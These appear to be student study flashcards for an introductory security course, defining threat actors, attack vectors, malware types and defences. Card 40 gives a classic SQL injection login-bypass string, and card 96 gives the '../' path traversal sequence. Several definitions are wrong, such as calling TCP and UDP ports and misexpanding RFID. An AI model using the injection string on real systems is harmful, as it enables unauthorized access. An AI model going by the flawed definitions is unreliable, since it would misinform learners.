Chapter 2 Flashcards
(112 cards)
1
Q
Threat actor
A
Any person or group who presents a security risk
2
Q
nation state actors
A
Highly skilled, highly funded government-sponsored attackers
3
Q
hactivist
A
Attacks for ideological reasons, often highly sophisticated with little resources/funding
4
Q
unskilled attacker (script kiddie)
A
attackers with little skill and little funding
5
Q
Insider threat
A
many resources, medium sophistication, employee out for revenge or financial gain, takes advantage of organization knowledge, knows exactly where to hit vulnerable systems
6
Q
Organized crime
A
highly funded, highly sophisticated, motivated by money
7
Q
Shadow IT
A
many resources, low sophistication, group that doesn’t want to deal with IT dept regulations, circumvents existing IT
8
Q
Threat vector
A
Method used by an attacker to access a victim’s machine
9
Q
Agentless
A
Executable that does not require installation, such as a web-based executable
10
Q
Client-based
A
Executable that requires installation, think installed malware
11
Q
Unsupported systems
A
Outdated operating systems no longer supported by the manufacturer; no patches exist
12
Q
WEP, WPA, WPA2, WPA3
A
Wireless network security protocols used to encrypt wireless traffic. WPA3 is most secure and up to date.
13
Q
802.1X
A
A port-based authentication protocol. Prevents access to the network unless someone provides proper credentials. Can be used wireless or wired.
14
Q
Bluetooth
A
Attackers can use bluetooth for reconnaissance to determine location
15
Q
TCP
A
Transmission Control Protocol. A port. TCP is usually seen as TCP/IP in writing.
16
Q
UDP
A
User Datagram Protocol. A port.
17
Q
Open port vector
A
an opportunity for an attacker. Could be due to a misconfiguration or a system vulnerability.
18
Q
Default credentials
A
if you keep default credentials, very easy for attackers to gain access
19
Q
MSP
A
Managed service provider
20
Q
Supply chain vector
A
An attacker could gain access to a network using a vendor or a supplier. Think 2013 target CC breach and counterfeit Cisco hardware being delivered
21
Q
Phishing
A
Social engineering, usually delivered by email, SMS. Usually grammar, spacing, URL not quite right. Creates a sense of urgency to click a malicious link.
22
Q
Business Email Compromise (BEC)
A
Attacker pretends to be a trusted business for financial gain
23
Q
BEC
A
Business Email Compromise
24
Q
Pretexting
A
Lying to get information, often creating stories.
25
Typosquatting
An attacker registers a domain name with a common misspelling of an existing URL
26
Vishing
Voice phishing over the phone
27
Smishing
SMS phishing
28
Watering Hole attack
A malicious attack that is directed toward a small group of specific individuals who visit the same 3rd party website, such as a sandwich shop.
29
DLL
Dynamic Link Library. A Windows library containing data and code.
30
Malware
Malware runs in memory. Malware can run on its own or inject itself into a legitimate process
31
Memory Injection
Malware injecting itself into an existing process, getting access to the data with the same rights and permissions, performing a privilege escalation.
32
DLL injection
Attacker injects a path to a malicious DLL (Dynamic link library) into memory and runs it.
33
Buffer overflow attack
Attacker overwrites a buffer of memory, spilling over into other memory areas, effectively manipulating data to change the permissions the system gives the attacker
34
Race condition
A programming flaw that occurs when two sets of code attempt to access the same resource. The first one to access the resource wins, which can result in inconsistent results.
35
TOCTOU (Time-of-Check to Time-of-Use)
Race condition. You don't check bank account before going grocery shopping.
36
TOCTOU
Time-of-Check to Time-of-Use
37
OS
Operating system
38
SQL
Structured query language. The most common database management system language
38
Malicious update
A fake update used to introduce malicious functionality
39
SQLi
SQL injection
40
SQL injection
An attacker injects commands into a field to be manipulated by the database. All they have to do is enter 'OR '1 = 1' and they have access to entire database.
41
XSS
Cross-site scripting
42
Cross-site Scripting
Attacker sends malicious link to victim, runs a legitimate website, but attacker runs malicious code behind the scenes to obtain user's data.
43
Vulnerable XSS website
Website with search engine that allows javascript code injection for attacker to obtain information
44
Persistent (stored) XSS attack
Attacker posts malicious message on social media, out there for people to click on
45
Internet of things (IoT) devices hardware vulnerabilities
Stove, refrigerator, garage door opener, could potentially connect to network and become vulnerable to attack
46
IoT
Internet of Things
47
Firmware
Operating system inside of hardware devices- only manufacturers are able to fix, think surgical/medical device reps
48
EOL
End of Life
49
End of life
Manufacturer stops making product
50
EOSL
End of service life
51
End of service life
Manufacturer no longer provides technical support with patches, etc
52
Legacy devices
May want to add firewall rules to restrict use of legacy devices
53
VM
Virtual machine
54
Virtual machine
Largely same capabilities and security practices apply as physical machines
55
Virtual machine escape
Attacker escapes from VM and interacts with host operating system, allows attacker to exploit entire virtual world and the data within
55
Resource Reuse
Data inadvertently being shared between VMs
56
Jailbreaking/rooting
Attacker gaining access to mobile device, installing custom firmware and circumventing security features and mobile device manager becomes useless.
57
MDM
Mobile device manager/management
58
Sideloading
Apps installed manually without app store
59
Virus
Malware that can reproduce itself through running a program, etc
60
Fileless virus
stealth attack virus, never installed on a file or system, but runs in memory instead
61
Ransomware
Encrypts all your data and holds it hostage, usually offering the key in exchange for money
62
Worm
Malware that self-replicates without any intervention, uses the network as a transmission medium, (don't need to run a program or anything)
63
Spyware
Malware that spies on you, usually for identity theft purposes- can include keylogging technology and browser monitoring
64
Bloatware
Apps installed on a new device, often by the manufacturer, that you don't need, and take up valuable storage space. Can be difficult to remove
65
Keyloggers
Software that can capture keystrokes, such as passwords, email info, URLs, private messaging. May also store other information such as screenshots
66
Trojan Horse
A type of malware that downloads on to your computer disguised as a legitimate program
67
Logic bomb
Waits for a specific date or event to "go off"
67
Rootkit
Hides itself in the root of the operating system. It runs as part of the kernal in the core operating system files, making it difficult to detect.
68
OS
Operating system
69
Brute force physical attack
Literally breaking down doors to achieve a goal
70
RFID
Radio Frequency identified cloning
71
Radio Frequency identified cloning (RFID)
Cloning keyfobs, employee access cards
72
Environmental physical attack
Could attack HVAC system, the operating environment, the power source
73
Denial of service (DoS) attack
Attacker forces a system to fail by overloading it
74
DoS attack
Denial of Service
75
DDoS attack
Distributed Denial of Service
76
Distributed Denial of Service (DDoS) attack
A coordinated attack launching an army of computers to bring down a service by creating a traffic spike using up all the system's bandwidth. Attackers could utilize botnets to achieve this.
77
DNS amplification
Attacker submits a small request that has a large volume response to the victim's system to overwhelm it
78
DNS
Domain name system
79
DNS (Domain Name system) Spoofing/Posioning
Attacker modifies the DNS server or the client host file and causes user to visit a malicious website instead of a trusted one, could also perform an on-path attack and alter the DNS system IP address to match the attacker's, so that subsequent requests will go to attacker's computer instead of the DNS server.
80
URL hijacking
same as typosquatting
81
Domain hijacking
Attacker gains access to domain name of DNS and therefore gains access to the systems it is attached to.
82
Radio Frequency (RF) Jamming
Type of Denial of Service (DoS) attack preventing wireless communication
83
Wireless deauthentication attack
Type of wireless Denial of Service (DoS) attack suddenly disconnecting people from the network they are working on
84
IEEE 802.1X
Opens ports for network access when an organization authenticates a user's identity and authorizes them for access to the network. Wired or wireless.
85
Wireless jamming
Usually reactive jamming, jams only when people try to use the network
86
On path attack
Middleman intercepting conversation in real time to modify information sent
87
ARP poisoning/spoofing
on path attack on a local subnet, ARP has no security so it is vulnerable, attacker can respond to a request impersonating a router IP address or other system
88
On-path browser attack
man in the browser attack. malware or trojan on user device redirects traffic to attacker. Waits for you to login to something like your bank account to obtain valuable information
89
Replay attack/Credential replay
Attack gathers data via network tap, on path attack, etc and uses that data to pose as the victim computer by replaying that information. Ex: attacker sits in and obtains username and hashed password. Later replays it to the server to pose as the victim. Can avoid pass the hash attack by salting the hash or using encryption.
90
Spraying attack
attacker uses most common passwords, 2-3 so as to not lock out user and set off alarms if they do not gain access
91
brute force password attack
attacker attempts as many times and combinations as possible until lockout or success, could take months
92
Malicious code
could be packaged in an executable, scripts running in system, viruses, worms, trojan horses, etc
93
Privilege escalation
attacker accessing regular user's credentials and gaining access to administrator rights or higher-level access
94
Cross site request forgery (XSRF, CSRF, sea-surf)
Session riding. Attacker impersonates user and makes requests to server that user did not make. Such as independently posting to your facebook page when you're logged into FB
95
XSRF, CSRF, sea-surf
Cross-site request forgery, session riding
96
Directory traversal/path traversal
aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)
97
Birthday attack
Attacker finding a hash collision
98
downgrade attack
downgrading security for user. Example: SSL stripping attack, where on path attack is used to redirect user to send their data without protection of https in URL
99
Segmentation
separating systems for higher performance or security. Ex: VLANs, load balancing,
100
PCI
Payment card industry
101
ACL
Access control list
102
Access control list (ACL)
access control list, could be grouped by user type, user function, IP address, etc. for higher security
103
Configuration enforcement
Each time a device connects, a posture assessment is performed to mitigate risk. If systems are too out of date, company may require system to be quarantined/out of commission until updates have been implemented.
104
Decommissioning
remove sensitive data from storage drives before decommissioning equipment, could later recycle or destroy device
105
Endpoint detection and response (EDR)
EDR technology can detect a threat, investigate a threat, and respond by isolating the system, quarantining the system, and rolling back to a previous configuration, no technician input required
106
EDR
Endpoint detection and response
107
API
Application programming interface
108
HIPS (Host -based intrusion prevention system)
Can recognize and block known attacks on each individual device, secure operating system OS, often built into EDR (Endpoint detection and response) or anti-malware software
109
HIPS
Host-based Intrusion Prevention System
